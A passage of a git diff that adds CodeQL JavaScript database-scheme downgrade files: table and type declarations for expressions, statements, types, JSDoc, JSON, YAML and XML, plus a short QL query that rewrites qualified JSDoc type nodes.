@regexp_unicode_property_escape; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/upgrade.properties b/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/upgrade.properties new file mode 100644 index 000000000000..13f42c6a9d1b --- /dev/null +++ b/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/upgrade.properties @@ -0,0 +1,2 @@ +description: Add support for quoted string, intersection and subtraction +compatibility: backwards diff --git a/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/jsdoc_type_exprs.ql b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/jsdoc_type_exprs.ql new file mode 100644 index 000000000000..4f12eb443f93 --- /dev/null +++ b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/jsdoc_type_exprs.ql @@ -0,0 +1,37 @@ +// Removes all nodes nested inside a qualified type access, +// and changes qualified type access nodes to "named type" nodes. +// +/* + * jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + * int kind: int ref, + * int parent: @jsdoc_type_expr_parent ref, + * int idx: int ref, + * varchar(900) tostring: string ref); + */ + +class JSDocTypeExprParent extends @jsdoc_type_expr_parent { + string toString() { none() } +} + +class JSDocTypeExpr extends @jsdoc_type_expr { + string toString() { none() } + + JSDocTypeExpr getChild(int n) { jsdoc_type_exprs(result, _, this, n, _) } + + int getNewKind() { jsdoc_type_exprs(this, result, _, _, _) } + + predicate shouldRemove() { this = any(JSDocQualifiedTypeAccess a).getChild(_) } +} + +class JSDocQualifiedTypeAccess extends @jsdoc_qualified_type_expr, JSDocTypeExpr { + override int getNewKind() { + result = 5 + /* 5 = @jsdoc_named_type_expr */ + } +} + +from JSDocTypeExpr node, JSDocTypeExprParent parent, int idx, string tostring +where + jsdoc_type_exprs(node, _, parent, idx, tostring) and + not node.shouldRemove() +select node, node.getNewKind(), parent, idx, tostring diff --git a/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/old.dbscheme b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/old.dbscheme new file mode 100644 index 000000000000..ccefb5e2d493 --- /dev/null +++ b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/old.dbscheme @@ -0,0 +1,1194 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type 